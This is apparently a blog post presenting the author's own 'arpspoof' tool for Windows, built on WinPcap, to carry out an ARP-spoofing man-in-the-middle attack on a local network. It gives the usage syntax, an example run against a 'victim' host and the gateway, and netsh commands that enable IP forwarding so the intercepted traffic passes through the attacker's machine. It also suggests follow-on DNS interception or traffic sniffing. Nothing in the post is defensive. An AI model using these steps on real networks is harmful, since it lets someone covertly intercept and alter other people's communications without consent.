Lets play with Winpcap.
Quoting the winpcap web site : « WinPcap consists of a driver that extends the operating system to provide low-level network access and a library that is used to easily access low-level network layers ».
Lets use it to perform a quick and easy man-in-the-middle-attack with arp spoofing.
Quoting wikipedia : « a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other ».
Source code and binaries are available here.
Usage is:
arpspoof 1.0 by erwan2212@gmail.com
arpspoof list-interfaces
arpspoof interface-index ip1 ip2
Example:
arpspoof.exe 0 192.168.1.125 192.168.1.250
arpspoof 1.0 by erwan2212@gmail.com
arpspoof list-interfaces
arpspoof interface-index ip1 ip2
ip1:192.168.1.125 mac1:001DE0-567737
ip2:192.168.1.250 mac2:C05627-B7FD32
spoofed mac:94DE80-C2A41E
sending packets…press a key to stop…
192.168.1.125 is victim (a computer on my network).
192.168.1.250 is my network gateway/router on my network.
94DE80-C2A41E is my mac address (i.e the attacker mac address).
192.168.1.125 will believe that mac address of the router (192.168.1.250) is mine i.e 94DE80-C2A41E.
192.168.1.250 will believe that mac address of the victim (192.168.1.125) is mine i.e 94DE80-C2A41E.
In effect all traffic between these 2 hosts will go thru my computer.
One important thing not to forget : enable forwarding on your computer or else all traffic between these 2 hosts will be dropped.
How? easy :
-check your interfaces : netsh interface ipv4 show interfaces
-enable forwarding on the desired interface : netsh interface ipv4 set interface x forwarding= »enabled »
Now you can perform an attack with intercept-dns from a previous article (dont forget to do a set layer=forward on the command line then).
Or simply sniff/capture the traffic with netdump.
Note that you could also use a GUI like Iptools to perform arpspoof.
See example screenshot here (C=client/victim, R=router).